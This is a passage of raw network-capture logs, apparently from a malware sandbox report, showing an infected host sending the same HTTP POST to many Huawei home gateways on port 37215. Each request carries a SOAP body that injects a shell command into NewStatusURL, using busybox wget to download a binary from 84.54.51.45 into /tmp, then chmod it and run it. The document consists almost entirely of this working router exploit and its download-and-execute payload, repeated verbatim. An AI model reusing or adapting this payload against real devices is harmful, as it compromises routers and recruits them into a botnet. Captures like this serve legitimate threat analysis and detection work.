                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            119192.168.2.1549130197.104.17.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175604105 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            120192.168.2.1533508197.71.16.4837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175626993 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            121192.168.2.1547074197.242.213.10137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175657988 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            122192.168.2.1536330197.49.202.9937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175678968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            123192.168.2.1539064197.80.91.7837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175700903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            124192.168.2.1559914197.83.45.24837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175726891 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            125192.168.2.1554470197.154.41.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175772905 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            126192.168.2.1558098197.127.60.5937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175795078 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            127192.168.2.1544324197.57.205.20337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175806999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            128192.168.2.1560466197.108.120.637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.175831079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
